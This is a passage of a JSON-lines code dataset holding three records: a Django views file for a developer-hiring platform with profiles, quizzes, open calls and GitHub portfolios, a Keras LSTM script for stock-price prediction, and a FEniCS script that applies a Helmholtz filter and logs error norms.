wiki_page.url\n\t\t\texcept AttributeError:\n\t\t\t\twiki_url = False\n\t\t\treturn (wiki_summary, wiki_url)\n\t\telse:\n\t\t\treturn (False, False)","sub_path":"grandpyapp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"541592380","text":"from django.contrib.auth.decorators import login_required\nfrom django.http import HttpResponse, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.models import User\nfrom django.db.models.aggregates import Max\nfrom django.core.paginator import Paginator\nfrom collections import Counter\nfrom django.urls import reverse\nimport requests\n\nimport json\nfrom decouple import config\n\nimport base64\nimport urllib.parse\nfrom django.contrib import messages\nfrom django.core import mail\nfrom django.template.loader import render_to_string\nfrom django.utils.html import strip_tags\n\nfrom accounts.forms import ProfileTypeForm, DeveloperFillingDetailsForm, RecruiterFillingDetailsForm\nfrom transactions.models import Transaction, Candidate,OpenCall,Applications\nfrom invitations.models import Invitation\nfrom projects.models import Project, Framework\nfrom frontend.form import Projectinvite, EditProjectForm,Submissions,Portfolio_form,Github_form,Experience_Form,About\nfrom frontend.models import candidatesprojects, devs, recruiters,submissions,Portfolio,Github,Experience\nfrom classroom.models import TakenQuiz,Student\nfrom marketplace.models import Job\nfrom taggit.models import TaggedItem\n\n\n@login_required\ndef developer_filling_details(request, current_profile):\n    if request.method == 'POST':\n        developer_filling_details_form = DeveloperFillingDetailsForm(request.POST, request.FILES)\n        if developer_filling_details_form.is_valid():\n            current_profile.github_repo = 
developer_filling_details_form.cleaned_data['github_repo']\n            current_profile.linkedin_url = developer_filling_details_form.cleaned_data['linkedin_url']\n            current_profile.portfolio = developer_filling_details_form.cleaned_data['portfolio']\n            current_profile.language = developer_filling_details_form.cleaned_data['language']\n            current_profile.framework = developer_filling_details_form.cleaned_data['framework']\n            current_profile.years = developer_filling_details_form.cleaned_data['years']\n            current_profile.gender = developer_filling_details_form.cleaned_data['gender']\n            current_profile.availabilty = developer_filling_details_form.cleaned_data['availabilty']\n            current_profile.country = developer_filling_details_form.cleaned_data['country']\n            current_profile.phone_number = developer_filling_details_form.cleaned_data['phone_number']\n            current_profile.stage = 'complete'\n            current_profile.save()\n\n            user = User.objects.get(username=request.user)\n            exp1 = ''\n            exp2 = ''\n            # add tags to saved profile\n            if user.profile.years == '1-2':\n                exp1 = 'Entry'\n                exp2 = 'Junior'\n            elif user.profile.years == '2-4':\n                exp1 = 'Junior'\n                exp2 = 'Mid-Level'\n            elif user.profile.years == '4-above':\n                exp1 = 'Mid-Level'\n                exp2 = 'Senior'\n\n            profile_tags = [current_profile.language, current_profile.framework, exp1, exp2, current_profile.country.name, current_profile.availabilty]\n\n            print('profile_tags-------------------> ', profile_tags)\n\n            current_profile.tags.add(*profile_tags)\n\n            return redirect(reverse('frontend:index'))\n    else:\n        developer_filling_details_form = DeveloperFillingDetailsForm()\n    return render(request, 'frontend/developer/developer_filling_details.html',\n                  {'developer_filling_details_form': developer_filling_details_form})\n\n\n@login_required\ndef recruiter_filling_details(request, current_profile):\n    if request.method == 'POST':\n        recruiter_filling_details_form = RecruiterFillingDetailsForm(request.POST)\n        if recruiter_filling_details_form.is_valid():\n            current_profile.company = recruiter_filling_details_form.cleaned_data['company']\n            current_profile.job_role = recruiter_filling_details_form.cleaned_data['job_role']\n            current_profile.industry = recruiter_filling_details_form.cleaned_data['industry']\n            current_profile.country = recruiter_filling_details_form.cleaned_data['country']\n            current_profile.company_url = recruiter_filling_details_form.cleaned_data['company_url']\n            current_profile.stage = 'complete'\n            current_profile.save()\n            return redirect(reverse('frontend:index'))\n    else:\n        recruiter_filling_details_form = RecruiterFillingDetailsForm()\n    return render(request, 'frontend/recruiter/recruiter_filling_details.html',\n                  {'recruiter_filling_details_form': recruiter_filling_details_form})\n\n\n@login_required\ndef profile_type_selection(request, current_profile):\n    if request.method == 'POST':\n        profile_type_form = ProfileTypeForm(request.POST)\n        if profile_type_form.is_valid():\n            profile_type = profile_type_form.cleaned_data['profile_type']\n            current_profile.user_type = profile_type\n            if profile_type == 'developer':\n                current_profile.stage = 'developer_filling_details'\n                # test_registration = Student(user=request.user)\n                # test_registration.save()\n            elif profile_type == 'recruiter':\n                current_profile.stage = 'recruiter_filling_details'\n            current_profile.save()\n            return redirect(reverse('frontend:index'))\n    else:\n        profile_type_form = ProfileTypeForm()\n    return render(request, 
'frontend/profile_type_selection.html', {'profile_type_form': profile_type_form})\n\n\ndef index(request):\n if request.user.is_authenticated:\n current_profile = request.user.profile\n transactions = Transaction.objects.filter(user=request.user).filter(stage='complete')\n if request.user.profile.stage == 'profile_type_selection':\n return profile_type_selection(request, current_profile)\n elif request.user.profile.stage == 'developer_filling_details':\n return developer_filling_details(request, current_profile)\n elif request.user.profile.stage == 'recruiter_filling_details':\n return recruiter_filling_details(request, current_profile)\n elif request.user.profile.stage == 'complete':\n if request.user.profile.user_type == 'developer':\n try:\n # user =request.user\n # tags = user.profile.tags.all()\n student = Student.objects.get(user_id=request.user.id)\n passedquizz = TakenQuiz.objects.filter(score__gt=50).filter(student_id=student)\n return render(request, 'frontend/developer/developer.html', {'passedquizz': passedquizz})\n except Student.DoesNotExist:\n obj = Student(user=request.user)\n obj.save()\n return render(request, 'frontend/developer/developer.html')\n\n elif request.user.profile.user_type == 'recruiter':\n jobs = Job.objects.filter(posted_by=request.user)\n return render(request, 'frontend/recruiter/recruiter.html', {'transactions': transactions,'jobs':jobs})\n else:\n return home(request)\n\n\ndef home(request):\n return render(request, 'frontend/landing.html')\n\n\n@login_required\ndef activity(request):\n if request.user.is_authenticated:\n transactions = Transaction.objects.filter(user=request.user)\n opencalls =OpenCall.objects.filter(recruiter=request.user)\n alltransactions =[]\n allopencalls =[]\n for transaction in transactions:\n alltransactions.append(transaction.id)\n for opencall in opencalls:\n allopencalls.append(opencall.transaction.id)\n\n res=set(alltransactions)-set(allopencalls)\n\n closedprojects =list(res)\n\n\n if request.user.profile.user_type == 'recruiter':\n return render(request, 'frontend/recruiter/my-activity.html', {'transactions': transactions,'closedprojects':closedprojects,'allopencalls':allopencalls})\n elif request.user.profile.user_type == 'developer':\n return render(request, 'frontend/developer/my-activity.html', {'transactions': transactions})\n\n@login_required\ndef tracker(request, id):\n project = Transaction.objects.get(id=id)\n candidates = candidatesprojects.objects.filter(transaction=id)\n submitted = submissions.objects.filter(transaction=id).all()\n return render(request, 'frontend/recruiter/tracker.html', {'candidates': candidates, 'project': project,'submitted':submitted})\n\n\n@login_required\ndef inprogress(request):\n user = request.user.id\n projects = candidatesprojects.objects.filter(candidate=user)\n return render(request, 'frontend/developer/inprogress.html', {'projects': projects})\n\n\n@login_required\ndef invites(request):\n candidates = Candidate.objects.filter(email=request.user.email)\n return render(request, 'frontend/developer/invites.html', {'candidates': candidates})\n\n\n@login_required\ndef projectdetails(request, id):\n form=Submissions()\n transaction=candidatesprojects.objects.get(id=id)\n projectinvite = Projectinvite()\n if Applications.objects.filter(candidate_id=request.user.id).filter(transaction_id=transaction.transaction_id).exists():\n opencall =Applications.objects.filter(candidate_id=request.user.id).filter(transaction_id=transaction.transaction_id).get()\n else:\n opencall=None\n project = 
candidatesprojects.objects.get(id=id)\n return render(request, 'frontend/developer/projectdetails.html',\n {'project': project, 'projectinvite': projectinvite,'opencall':opencall,'form':form})\n\n\n@login_required\ndef pendingproject(request, transaction_id):\n acceptedinvites = candidatesprojects.objects.filter(transaction_id=transaction_id, candidate=request.user)\n transaction = Transaction.objects.get(id=transaction_id)\n\n return render(request, 'frontend/developer/pendingproject.html',\n {'transaction': transaction, 'acceptedinvites': acceptedinvites})\n\n@login_required\ndef projectinvites(request, transaction_id):\n user = request.user.id\n trans_id = Transaction.objects.get(id=transaction_id)\n currentcandidate = User.objects.get(id=user)\n\n acceptedinvite = candidatesprojects(transaction=trans_id, candidate=currentcandidate, stage='invite-accepted')\n acceptedinvite.save()\n return redirect('frontend:buildproject')\n\n@login_required\ndef update_candidateprojects(request, candidateproject_id, transaction_id):\n transaction = Transaction.objects.get(id=transaction_id)\n candidatesproject = candidatesprojects.objects.get(id=candidateproject_id)\n candidatesproject.stage = 'project-in-progress'\n candidatesproject.save()\n return HttpResponseRedirect('/projectdetails/%s' % candidateproject_id)\n\n@login_required\ndef update_finished(request, candidateproject_id, transaction_id):\n transaction = Transaction.objects.get(id=transaction_id)\n candidatesproject = candidatesprojects.objects.get(id=candidateproject_id)\n candidatesproject.stage = 'project-completed'\n candidatesproject.save()\n return HttpResponseRedirect('/projectdetails/%s' % candidateproject_id)\n\n@login_required\ndef update_finishedopencall(request, project_id, transaction_id):\n if request.method == 'POST':\n submission_form = Submissions(request.POST)\n if submission_form.is_valid():\n transaction = Transaction.objects.get(id=transaction_id)\n\n subject = 'Project submission'\n repo=submission_form.cleaned_data['repositorylink']\n demo = submission_form.cleaned_data['demolink']\n html_message = render_to_string('invitations/email/submissions.html',\n {'dev': request.user, 'transaction': transaction,'demo':demo,'repo':repo})\n plain_message = strip_tags(html_message)\n from_email = 'codeln@codeln.com'\n to = 'dennis@codeln.com'\n mail.send_mail(subject, plain_message, from_email, [to], html_message=html_message)\n\n candidatesproject = candidatesprojects.objects.get(id=project_id)\n candidatesproject.stage = 'project-completed'\n candidatesproject.save()\n submit = submissions(candidate=request.user,transaction=transaction,demo=demo,repo=repo)\n submit.save()\n return HttpResponseRedirect('/projectdetails/%s' % project_id)\n\ndef pricing(request):\n return render(request, 'frontend/pricing.html')\n\n\ndef dev(request):\n return render(request, 'frontend/dev.html')\n\ndef competitions(request):\n return render(request, 'frontend/recruiter/competitions.html')\n\ndef takenquizzes(request):\n taken = TakenQuiz.objects.all()\n allquizzes = TakenQuiz.objects.filter(score__gte=50).all()\n\n return render(request, 'frontend/recruiter/takenquizzes.html',{'allquizzes':allquizzes,'taken':taken})\n\ndef howitworks(request):\n return render(request, 'frontend/how.html')\n\n\ndef report(request, email, transaction_id):\n user = User.objects.get(email=email)\n transaction = Transaction.objects.get(id=transaction_id)\n return render(request, 'frontend/recruiter/report.html', {'user': user, 'transaction': transaction})\n\n\ndef 
onboarddevs(request):\n for alluser in User.objects.all():\n if alluser.profile.user_type == 'developer':\n if alluser.profile.stage == 'complete':\n if not devs.objects.filter(email=alluser.email).exists():\n dev = devs()\n dev.email = alluser.email\n dev.firstname = alluser.first_name\n dev.lastname = alluser.last_name\n dev.language = alluser.profile.language\n dev.framework = alluser.profile.framework\n dev.country = alluser.profile.country\n dev.github = alluser.profile.github_repo\n dev.linkedin = alluser.profile.linkedin_url\n dev.portfolio = alluser.profile.portfolio\n dev.save()\n\n return redirect(reverse('frontend:seedevs'))\n\n\ndef onboardrecruiters(request):\n for alluser in User.objects.all():\n if alluser.profile.user_type == 'recruiter':\n if alluser.profile.stage == 'complete':\n if not recruiters.objects.filter(email=alluser.email).exists():\n recruiter = recruiters()\n recruiter.email = alluser.email\n recruiter.firstname = alluser.first_name\n recruiter.lastname = alluser.last_name\n recruiter.company = alluser.profile.company\n recruiter.companyurl = alluser.profile.company_url\n recruiter.country = alluser.profile.country\n recruiter.save()\n\n return redirect(reverse('frontend:seerecruiters'))\n\n\ndef credits(request):\n return render(request, 'frontend/credits.html')\n\ndef management(request):\n return render(request, 'frontend/recruiter/management.html')\n\n\ndef privacy(request):\n return render(request, 'frontend/privacy.html')\n\n\ndef terms(request):\n return render(request, 'frontend/terms.html')\n\n\ndef sample(request):\n return render(request, 'frontend/sample.html')\n\n\ndef page_404(request):\n return render(request, 'frontend/error_pages/404.html')\n\n\ndef page_500(request):\n return render(request, 'frontend/error_pages/500.html')\n\n\ndef seedevs(request):\n developers = devs.objects.all()\n return render(request, 'frontend/recruiter/devlist.html', {'developers': developers})\n\n\ndef seerecruiters(request):\n payers = recruiters.objects.all()\n return render(request, 'frontend/recruiter/recruiterslist.html', {'payers': payers})\n\n@login_required\ndef manageprojects(request):\n projects = Project.objects.all()\n return render(request, 'frontend/recruiter/projects.html', {'projects': projects})\n\n@login_required\ndef managetransactions(request):\n transactions = Transaction.objects.all()\n return render(request, 'frontend/recruiter/transactions.html', {'transactions': transactions})\n\n@login_required\ndef editproject(request, project_id):\n instance = get_object_or_404(Project, id=project_id)\n project = Project.objects.get(id=project_id)\n form = EditProjectForm(request.POST or None, instance=instance)\n if form.is_valid():\n form.save()\n return redirect('frontend:manageprojects')\n\n return render(request, 'frontend/recruiter/editproject.html',\n {'project': project, 'form': form})\n\n@login_required\ndef deleteproject(request, project_id):\n Project.objects.filter(id=project_id).delete()\n return redirect('frontend:manageprojects')\n@login_required\ndef addproject(request):\n form = EditProjectForm(request.POST or None)\n if form.is_valid():\n form.save()\n return redirect('frontend:manageprojects')\n return render(request, 'frontend/recruiter/addproject.html',\n { 'form': form})\n\n@login_required\ndef edittransactions(request, transaction_id):\n transaction = Transaction.objects.get(id=transaction_id)\n candidates =Candidate.objects.filter(transaction_id=transaction_id)\n return render(request, 
'frontend/recruiter/edittransaction.html',{'transaction':transaction,'candidates':candidates})\n@login_required\ndef deletetransaction(request,transaction_id):\n OpenCall.objects.filter(transaction_id=transaction_id).delete()\n Transaction.objects.filter(id=transaction_id).delete()\n Candidate.objects.filter(transaction_id=transaction_id).delete()\n return redirect('frontend:managetransactions')\ndef closetransaction(request,transaction_id):\n project = Transaction.objects.get(id=transaction_id)\n project.closed = True\n project.save()\n return redirect('frontend:managetransactions')\n@login_required\ndef buildproject(request):\n return render(request, 'classroom/students/worldprojects.html')\n@login_required\ndef calltoapply(request):\n alltransactions=Transaction.objects.filter(stage='complete').filter(closed=False)\n complete=[]\n for i in alltransactions:\n complete.append(i.id)\n\n opportunities = OpenCall.objects.all()\n opencalls=[]\n for io in opportunities:\n opencalls.append(io.transaction.id)\n\n payedopencalls = set(complete)&set(opencalls)\n payed = list(payedopencalls)\n\n qualifys = Applications.objects.filter(candidate=request.user)\n student = Student.objects.get(user_id=request.user.id)\n passedquizz = TakenQuiz.objects.filter(score__gte=50).filter(student_id=student)\n\n allsubjectspassed = []\n for d in passedquizz:\n allsubjectspassed.append(d.quiz.subject)\n\n uniquesubjects = list(set(allsubjectspassed))\n uniquelangs=[]\n langs = {}\n for unique in uniquesubjects:\n izzes = TakenQuiz.objects.filter(quiz__subject_id=unique.id).filter(student_id=student)\n\n for i in izzes:\n langs[i.quiz.subject.name] = i.quiz.subject.name\n original =[]\n taken = []\n for oppo in payed:\n original.append(oppo)\n for qualify in qualifys:\n taken.append(qualify.transaction.id)\n untaken=[]\n\n non = set(original) - set(taken)\n untaken=list(non)\n untakenopportunities =[]\n for untake in untaken:\n untakentrans =Transaction.objects.get(id=untake)\n untakenopportunities.append(untakentrans.id)\n\n return render(request, 'classroom/students/opencalls.html',{'opportunities':opportunities,\n 'qualifys':qualifys,'a':original,'taken':taken,'untaken':untaken,'langs':langs,'qualify':qualifys})\n@login_required\ndef apply(request,opportunity_id):\n language =OpenCall.objects.get(transaction=opportunity_id)\n student = Student.objects.get(user_id=request.user.id)\n passedquizz = TakenQuiz.objects.filter(score__gte=50).filter(student_id=student)\n\n\n allsubjectspassed = []\n for d in passedquizz:\n allsubjectspassed.append(d.quiz.subject)\n\n uniquesubjects = list(set(allsubjectspassed))\n\n\n for pa in uniquesubjects:\n blu=TakenQuiz.objects.filter(quiz__subject=pa).filter(student_id=student)\n doublequizzes =[]\n for paz in blu:\n doublequizzes.append(paz.score)\n\n\n if pa.name == language.transaction.framework.language.name or pa.name == language.transaction.framework.name: #TODO: let it be explcitly for framework if pa.name==language.project.framework\n qualifiedcandidate = Applications(recruiter=language.recruiter,transaction=language.transaction,project=language.project,candidate=request.user,stage='application sent',score=max(doublequizzes))\n\n qualifiedcandidate.save()\n\n\n\n\n return redirect('frontend:calltoapply')\n@login_required\ndef opencalltracker(request,trans_id):\n candidatespicked = Candidate.objects.filter(transaction_id=trans_id)\n\n candidates = Applications.objects.filter(transaction=trans_id).order_by('-score')\n return 
render(request,'frontend/recruiter/opencall.html',{'candidates':candidates,'trans_id':trans_id,'picked':candidatespicked})\n@login_required\ndef pickcandidates(request,trans_id,candidate_id):\n    candidate = User.objects.get(id=candidate_id)\n    transaction = Transaction.objects.get(id=trans_id)\n    application = Applications.objects.filter(transaction=trans_id).filter(candidate_id=candidate_id).get()\n    application.stage = 'accepted'\n    newcandidate = Candidate(email=application.candidate.email,first_name=application.candidate.first_name,last_name=application.candidate.last_name,transaction=transaction)\n    newcandidate.save()\n    application.save()\n    subject = 'Accepted for next stage'\n    html_message = render_to_string('invitations/email/opencallaccepted.html',\n                                    {'dev': request.user,'company':transaction})\n    plain_message = strip_tags(html_message)\n    from_email = 'codeln@codeln.com'\n    to = candidate.email\n    mail.send_mail(subject, plain_message, from_email, [to], html_message=html_message)\n    return HttpResponseRedirect('/opencalltracker/%s' % trans_id)\n\n\n@login_required\ndef portfolio(request):\n    try:\n\n        candidate = Github.objects.get(candidate=request.user)\n        user = candidate.github_username\n        username = config('GITHUB_USERNAME',default='GITHUB_USERNAME')\n        token = config('ACCESS_TOKEN',default='ACCESS_TOKEN')\n        json_data = requests.get('https://api.github.com/users/' + user, auth=(username, token)).json()\n\n        form = Portfolio_form()\n        experience_form = Experience_Form()\n        about_form = About()\n        repo = 'https://api.github.com/users/' + user + '/repos'\n        repos = requests.get(repo, auth=(username, token)).json()\n        paginator = Paginator(repos, 8)\n\n        page = request.GET.get('page')\n        repoz = paginator.get_page(page)\n        languages = []\n\n        # one entry per repository, not one per key of each repo dict\n        for i in repos:\n            languages.append(i['language'])\n\n        counter = Counter(languages)\n        labels = []\n        c = {}\n        items = []\n        for z in counter:\n            c[z] = counter[z]\n            labels.append(z)\n            items.append(counter[z])\n        data = {\n            \"labels\": labels,\n            \"data\": items,\n        }\n        student = Student.objects.get(user_id=request.user.id)\n        verified_skills = TakenQuiz.objects.filter(student=student).filter(score__gte=50).all()\n        skill = []\n        for verified_skill in verified_skills:\n            skill.append(verified_skill.quiz.subject.name)\n        skillset = set(skill)\n        skills = list(skillset)\n\n\n\n        experiences = Experience.objects.filter(candidate=request.user).all()\n        verified_projects = Portfolio.objects.filter(candidate=request.user).all()\n        return render(request, 'frontend/developer/portfolio.html',\n                      {'json': json_data, 'repos': repoz, 'data': data, 'c': c, 'form': form,\n                       'verified_projects': verified_projects,'experience_form':experience_form,'experiences':experiences,\n                       'skills':skills,'candidate':candidate,'about_form':about_form})\n    except Github.DoesNotExist:\n        form = Github_form()\n\n        return render(request, 'frontend/developer/github.html',{'form':form})\n\n\n@login_required\ndef newproject(request):\n    if request.method == 'POST':\n        myprojects = Portfolio_form(request.POST)\n        if myprojects.is_valid():\n            title = myprojects.cleaned_data['title']\n            description = myprojects.cleaned_data['description']\n            repo = myprojects.cleaned_data['repository_link']\n            demo = myprojects.cleaned_data['demo_link']\n            newprojo = Portfolio(candidate=request.user,demo_link=demo,repository_link=repo,title=title,description=description)\n            newprojo.save()\n    return redirect(reverse('frontend:portfolio'))\n@login_required\ndef get_data(request, *args, **kwargs):\n    try:\n        candidate = 
Github.objects.get(candidate=request.user)\n        user = candidate.github_username\n        username = config('GITHUB_USERNAME',default='GITHUB_USERNAME')\n        token = config('ACCESS_TOKEN',default='ACCESS_TOKEN')\n        repo = 'https://api.github.com/users/' + user + '/repos'\n        repos = requests.get(repo, auth=(username, token)).json()\n\n        languages = []\n        # one entry per repository, not one per key of each repo dict\n        for i in repos:\n            languages.append(i['language'])\n        counter = Counter(languages)\n        labels = []\n        items = []\n        for z in counter:\n            labels.append(z)\n            items.append(counter[z])\n        data = {\n            \"labels\": labels,\n            \"data\": items,\n        }\n\n        return JsonResponse(data)\n\n\n    except Github.DoesNotExist:\n        form = Github_form()\n\n        return render(request, 'frontend/developer/github.html',{'form':form})\n\ndef github(request):\n    if request.method == 'POST':\n        newuser = Github_form(request.POST)\n        if newuser.is_valid():\n            username = newuser.cleaned_data['github_username']\n            password = newuser.cleaned_data['password']\n\n            if requests.get('https://api.github.com/users/' + username, auth=(username, password)):\n                newgithubprofile = Github(candidate=request.user, github_username=username)\n                newgithubprofile.save()\n                return redirect(reverse('frontend:portfolio'))\n            else:\n\n\n                return redirect(reverse('frontend:portfolio'))\n\n    return redirect(reverse('frontend:portfolio'))\ndef experience(request):\n    if request.method == 'POST':\n        new_experience = Experience_Form(request.POST)\n        if new_experience.is_valid():\n            title = new_experience.cleaned_data['title']\n            company = new_experience.cleaned_data['company']\n            description = new_experience.cleaned_data['description']\n            location = new_experience.cleaned_data['location']\n            duration = new_experience.cleaned_data['duration']\n            experience = Experience(candidate=request.user,title=title,description=description,company=company,location=location,duration=duration)\n            experience.save()\n            return redirect(reverse('frontend:portfolio'))\n        else:\n            return redirect(reverse('frontend:portfolio'))\n\n\n    return redirect(reverse('frontend:portfolio'))\n\n@login_required\ndef editportfolioproject(request,project_id):\n    instance = get_object_or_404(Portfolio, id=project_id)\n    project = Portfolio.objects.get(id=project_id)\n    form = Portfolio_form(request.POST or None, instance=instance)\n    if form.is_valid():\n        form.save()\n        return redirect('frontend:portfolio')\n\n    return render(request, 'frontend/developer/editproject.html',{'project': project,'form':form})\n\ndef about(request,candidate_id):\n    instance = get_object_or_404(Github,candidate_id=candidate_id)\n    if request.method == 'POST':\n        new_about = About(request.POST or None,instance=instance)\n        if new_about.is_valid():\n            new_about.save()\n            return redirect('frontend:portfolio')\n    return redirect(reverse('frontend:portfolio'))\n\n\n","sub_path":"frontend/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":28361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"262576852","text":"import pandas as pd\nimport numpy as np\nimport tensorflow.keras\nimport tensorflow as tf\nfrom tensorflow.keras.preprocessing.sequence import TimeseriesGenerator\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import LSTM, Dense\n\nfilename = \"GOOGL.csv\"\ndf = pd.read_csv(filename)\nprint(df.info())\ndf['Date'] = pd.to_datetime(df['Date'])\ndf.set_axis(df['Date'], inplace=True)\ndf.drop(columns=['Open', 'High', 'Low', 'Volume'], inplace=True)\n\nclose_data = df['Close'].values\nclose_data = 
close_data.reshape((-1,1))  # TimeseriesGenerator expects 2-D input of shape (n_samples, n_features)\n\nsplit_percent = 0.80\nsplit = int(split_percent*len(close_data))\n\nclose_train = close_data[:split]\nclose_test = close_data[split:]\n\ndate_train = df['Date'][:split]\ndate_test = df['Date'][split:]\n\nprint(len(close_train))\nprint(len(close_test))\n\nlook_back = 15\n\ntrain_generator = TimeseriesGenerator(close_train, close_train, length=look_back, batch_size=20)\ntest_generator = TimeseriesGenerator(close_test, close_test, length=look_back, batch_size=1)\n\nmodel = Sequential()\nmodel.add(\n    LSTM(10,\n        activation='relu',\n        input_shape=(look_back,1))\n)\nmodel.add(Dense(1))\nmodel.compile(optimizer='adam', loss='mse')\n\nnum_epochs = 25\nmodel.fit_generator(train_generator, epochs=num_epochs, verbose=1)\n\nprediction = model.predict_generator(test_generator)\n\nclose_train = close_train.reshape((-1))\nclose_test = close_test.reshape((-1))\nprediction = prediction.reshape((-1))\nimport plotly.graph_objects as go  # graph_objects (not plotly.express) provides go.Scatter, go.Layout and go.Figure\n\n\ntrace1 = go.Scatter(\n    x = date_train,\n    y = close_train,\n    mode = 'lines',\n    name = 'Data'\n)\ntrace2 = go.Scatter(\n    x = date_test,\n    y = prediction,\n    mode = 'lines',\n    name = 'Prediction'\n)\ntrace3 = go.Scatter(\n    x = date_test,\n    y = close_test,\n    mode='lines',\n    name = 'Ground Truth'\n)\nlayout = go.Layout(\n    title = \"Google Stock\",\n    xaxis = {'title' : \"Date\"},\n    yaxis = {'title' : \"Close\"}\n)\nfig = go.Figure(data=[trace1, trace2, trace3], layout=layout)\nfig.show()","sub_path":"scr.py","file_name":"scr.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"483309510","text":"from dolfin import *\nimport math as m\nimport numpy as np\nimport csv\n\nmethodname = \"EFR\"\nS = 1.0  # scale such that delta = S*h\nP = 2  # polynomial degree of FE\nR = 2\n\n\ndt = 0.001\nT = 0.1\n\n\nN = 0\nlvl = 1\n\nsigma = 1.0\nmu = 10**(-6)\nvelocity = as_vector([2.0,3.0])\n\nmyfile = 'errorEFR403b.csv'\n\nfor nx in [50,100,200,400,800]:\n\tdelta = 1.0  # S*1.0/nx\n\tprint(delta)\n\tt = 0.0\n\tfolder = \"040218/dt\"+str(dt)+\"h\"+str(nx)+\"_\"\n\n\tu_exact = Expression('sin(DOLFIN_PI*x[0])*cos(DOLFIN_PI*x[1])', degree = R)\n\t#u_ = Expression('2*pow(DOLFIN_PI, 2)*pow(delta, 2)*sin(DOLFIN_PI*x[0])*cos(DOLFIN_PI*x[1]) + sin(DOLFIN_PI*x[0])*cos(DOLFIN_PI*x[1])', degree = R, delta = delta)\n\n\tu_ = Expression('sin(DOLFIN_PI*x[0])*cos(DOLFIN_PI*x[1]) + 2*pow(DOLFIN_PI, 2)*sin(DOLFIN_PI*x[0])*cos(DOLFIN_PI*x[1])', degree=R)\n\tu_D = Expression(u_exact.cppcode, degree = R)\n\n\tmesh = UnitSquareMesh(nx,nx)\n\th = CellDiameter(mesh)\n\tQ = FunctionSpace(mesh, \"CG\", P)\n\n\n\t# Set up boundary condition\n\tdef boundary(x, on_boundary):\n\t\treturn on_boundary\n\tbc = DirichletBC(Q, u_D, boundary)\n\n\n\t# Don't Modify Below This! -----------#
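\n\n\t# The form a2 assembled below is the weak Helmholtz filter: find u_tilde with\n\t# (v, u_tilde) + delta^2 (grad v, grad u_tilde) = (v, u) for all test v,\n\t# i.e. the discretisation of u_tilde - delta^2 * Laplace(u_tilde) = u.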
\n\n\t# Test and trial functions\n\tu, v = TrialFunction(Q), TestFunction(Q)\n\n\tu_tilde0 = Function(Q)\n\n\n\t# Define variational problem for step 2a (apply Helmholtz filter)\n\t# Note: only RHS changes, so we can keep the same a2 throughout\n\n\ta2 = v*u*dx + delta*delta*dot(grad(v), grad(u))*dx #lhs(F_Hfilter)\n\tA2 = assemble(a2)\n\n\t# Define indicator function to evaluate current time step\n\tdef a(u_tilde, u_, t):\n\t\tindicator = Expression('sqrt((a-b)*(a-b))', degree = 2, a = u_, b = u_tilde)\n\t\tindicator = interpolate(indicator, Q)\n\t\tmax_ind = np.amax(indicator.vector().get_local())\n\n\t\t# Normalize indicator such that it's between [0,1].\n\t\tif max_ind < 1:\n\t\t\tmax_ind = 1.0\n\n\t\tindicator = Expression('a/b', degree = 2, a = indicator, b = max_ind)\n\t\tindicator = interpolate(indicator, Q)\n\t\tindicator.rename('a','a')\n\t\t#out_file_ind << (indicator, float(t))\n\t\treturn indicator\n\tL2 = v*u_*dx\n\n\t# def L2(u_): # input is intermediate velocity OR previous u_tilde solution\n\t\t# L2 = v*u_*dx\n\t\t# return L2\n\n\t# Define variational problem for step 2b (evaluate indicator and find filtered solution)\n\tdef a3(ind):\n\t\ta3 = v*u*dx + delta*delta*dot(grad(v), ind*grad(u))*dx\n\t\treturn a3\n\n\n\t#L3 = v*u_*dx\n\n\t# --- End EFR --- #\n\n\tnum_steps = int(round(T / dt, 0))\n\n\t# Create bilinear and linear forms\n\t# a1 = lhs(F)\n\t# L = rhs(F)\n\n\t# Assemble matrices\n\t# A1 = assemble(a1)\n\t# bc.apply(A1)\n\n\t# Create progress bar\n\tprogress = Progress('Time-stepping')\n\tset_log_level(PROGRESS)\n\n\n\t# --- Time-stepping --- #\n\n\tout_file_ind = File(folder+\"a_N\"+str(N)+\"_EFR.pvd\") # indicator function\n\tout_file_ubar = File(folder+\"ubar_N\"+str(N)+\"_EFR.pvd\") # filtered solution\n\n\t# for n in range(num_steps):\n\t\t# Step 1 Solve on Coarse Grid\n\n\t\t# b = assemble(L)\n\t\t# bc.apply(b)\n\t\t# solve(A1, u_.vector(), b, \"gmres\")\n\n\t\t# Step 2a Solve Helmholtz filter\n\t\t# N=0\n\t#b2_0 = assemble(L2(u_))\n\tb2_0 = assemble(L2)\n\tbc_0 = DirichletBC(Q, u_D, boundary)\n\tbc_0.apply(b2_0)\n\tbc_0.apply(A2)\n\tsolve(A2, u_tilde0.vector(), b2_0, \"gmres\")\n\n\t#DF = Expression('a', degree = R, a=u_tilde0)\n\n\t\t# Step 2b Calculate Indicator and solve Ind Problem\n\t\t# ind = a(DF, u_, float(t))\n\n\t\t# A3 = assemble(a3(ind))\n\t\t# bc.apply(A3)\n\n\t\t# b3 = assemble(L3)\n\t\t# bc.apply(b3)\n\n\t\t# solve(A3, u_bar.vector(), b3, \"gmres\")\n\n\t\t# progress.update(t / T)\n\n\t\t# Update previous solution and source term\n\t\t# u_n.assign(u_bar)\n\t\t# Update current time\n\t\t# t += dt\n\t\t# f.t += dt\n\n\t# out_file_ind << (ind, float(t))\n\tout_file_ubar << (u_tilde0, float(t))\n\n\t# err_L2 keeps the error value distinct from the form L2 assembled above\n\terr_L2 = errornorm(u_exact, u_tilde0, norm_type='L2', degree_rise=3)\n\tH1_0 = errornorm(u_exact, u_tilde0, norm_type='H10', degree_rise=3)\n\tH1 = np.sqrt(err_L2**2 + H1_0**2)\n\n\tffile = open(myfile,\"a+\")\n\tif near(lvl, 1):\n\t\toutputf1 = methodname+' N = '+str(N)+', t = '+str(t)+\"\\n\"\n\t\tffile.write(outputf1)\n\n\toutputf = '\\nLevel '+str(lvl)+', nx = '+str(nx)+'\\n'\n\toutputf += 'L2,' + str(err_L2) + ',H1,' + str(H1) + '\\n \\n'\n\tffile.write(outputf)\n\tffile.close()\n\n\tlvl += 